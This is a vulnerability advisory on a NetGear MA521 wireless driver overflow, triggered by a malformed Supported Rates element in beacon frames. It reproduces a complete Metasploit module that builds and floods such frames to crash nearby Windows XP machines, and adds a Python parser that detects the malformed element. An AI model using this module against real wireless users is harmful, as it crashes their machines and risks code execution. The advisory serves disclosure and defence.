NetGear MA521 Wireless Driver Long Rates Overflow Vulnerability

Author: unknown  Source: unknown  Updated: 2007-1-26 15:11:26
2006-11-20 23:58:35
Published: 2006-11-18  Updated: 2006-11-20
Affected systems: Netgear MA521
Description:
BUGTRAQ ID: 21175
The NetGear MA521 is an 802.11b wireless PC card.
The MA521 driver contains a vulnerability in its handling of malformed frames; a remote attacker could exploit it to execute arbitrary code on the user's machine.
If a malformed frame (beacon or probe response) is received while the card is in active scanning mode, the MA521's MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. A remote attacker can trigger a buffer overflow by sending a frame carrying an invalid supported rates information element, leading to arbitrary code execution.
<*Source: Laurent Butti (laurent.butti@orange-ftgroup.com)
H D Moore (hdm@metasploit.com)
Link: http://projects.info-pull.com/mokb/MOKB-18-11-2006.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::Netgear_MA521_Rates < Msf::Auxiliary

  include Exploit::Lorcon

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear MA521 Wireless Driver Long Rates Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the NetGear MA521 wireless device
        driver under Windows XP. When a specific malformed frame (beacon or probe response)
        is received by the wireless interface under active scanning mode, the MA521nd5.SYS
        driver attempts to write to an attacker-controlled memory location. The vulnerability
        is triggered by an invalid supported rates information element.

        This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
        NetGear MA521 PCMCIA adapter. A remote code execution module is also in development.

        This module depends on the Lorcon library and only works on the Linux platform
        with a supported wireless card. Please see the Ruby Lorcon documentation
        (external/ruby-lorcon/README) for more information.
      },
      'Author'         => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
          ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
        ]
    ))

    register_options(
      [
        OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
        OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
      ], self.class)
  end

  def run
    open_wifi

    stime = Time.now.to_i
    rtime = datastore['RUNTIME'].to_i
    count = 0

    print_status("Creating malicious beacon frame...")
    frame = create_beacon()

    print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
    while (stime + rtime > Time.now.to_i)
      wifi.write(frame)
      select(nil, nil, nil, 0.10) if (count % 100 == 0)
      count += 1
    end
    print_status("Completed sending #{count} beacons.")
  end

  def create_beacon
    ssid    = Rex::Text.rand_text(6)
    bssid   = Rex::Text.rand_text(6)
    channel = datastore['CHANNEL'].to_i   # CHANNEL is registered by the Lorcon mixin
    seq     = [rand(255)].pack('n')

    frame =
      "\x80" +                          # type/subtype
      "\x00" +                          # flags
      "\x00\x00" +                      # duration
      eton(datastore['ADDR_DST']) +     # dst
      bssid +                           # src
      bssid +                           # bssid
      seq +                             # seq
      Rex::Text.rand_text(8) +          # timestamp value
      "\x64\x00" +                      # beacon interval
      "\x01\x00" +                      # capabilities

      # ssid IE
      "\x00" + ssid.length.chr + ssid +

      # supported rates IE overflow
      "\x01" + "\xFF" + ("\x41" * 255) +

      # channel IE
      "\x03" + "\x01" + channel.chr

    return frame
  end

end
end
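Added here as an example, not code from the advisory or from the Metasploit module, this Python parser walks the information elements of a beacon or probe-response body and reports a Supported Rates IE whose declared length lies outside the 1 to 8 octets the 802.11 standard allows, which is the bound the driver fails to enforce; the beacon builder and both sample bodies are constructed for illustration.

```python
# Added example (not from the advisory or the Metasploit module): validate the
# information elements (IEs) of an 802.11 beacon / probe-response body and flag a
# Supported Rates IE whose length is outside what the standard allows.
import struct

MGMT_FIXED_LEN = 12          # timestamp (8) + beacon interval (2) + capabilities (2)
EID_SSID, EID_SUPPORTED_RATES, EID_DS_PARAMS = 0, 1, 3
MAX_SUPPORTED_RATES = 8      # 802.11: the Supported Rates IE carries 1..8 rate octets


def parse_ies(body):
    """Return [(element_id, payload), ...] from the IE area of a management frame body.
    Raises ValueError when a declared IE length overruns the captured frame."""
    ies = []
    i = MGMT_FIXED_LEN
    while i < len(body):
        if i + 2 > len(body):
            raise ValueError("truncated IE header at offset %d" % i)
        eid, length = body[i], body[i + 1]
        if i + 2 + length > len(body):
            raise ValueError("IE %d declares %d bytes, only %d remain"
                             % (eid, length, len(body) - i - 2))
        ies.append((eid, body[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def check_rates_ie(body):
    """Return a list of findings; empty when every Supported Rates IE is in spec."""
    findings = []
    for eid, payload in parse_ies(body):
        if eid == EID_SUPPORTED_RATES and not 1 <= len(payload) <= MAX_SUPPORTED_RATES:
            findings.append("Supported Rates IE length %d outside 1..%d"
                            % (len(payload), MAX_SUPPORTED_RATES))
    return findings


def beacon_body(ssid, rates, channel):
    """Build a constructed beacon body: fixed fields, then SSID, rates and DS IEs."""
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 1)   # timestamp, interval, capabilities
    ie = lambda eid, data: bytes([eid, len(data)]) + data
    return (fixed + ie(EID_SSID, ssid) + ie(EID_SUPPORTED_RATES, rates)
            + ie(EID_DS_PARAMS, bytes([channel])))


# Constructed samples: a normal 802.11b beacon, and one shaped like the module's
# frame (rates IE with length 0xFF filled with 0x41).
BENIGN = beacon_body(b"lab-ap", bytes([0x82, 0x84, 0x8B, 0x96]), 6)
MALFORMED = beacon_body(b"lab-ap", b"\x41" * 255, 6)
```

The same length check belongs in any receive path that copies the rates IE into a fixed-size buffer, and the ValueError branch covers the second failure mode, an IE length that points past the end of the frame.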
Recommendation:
Vendor patch:
Netgear
-------
The vendor has not yet released a patch or upgrade. Users of this product are advised to monitor the vendor's home page for the latest version:
http://www.netgear.com/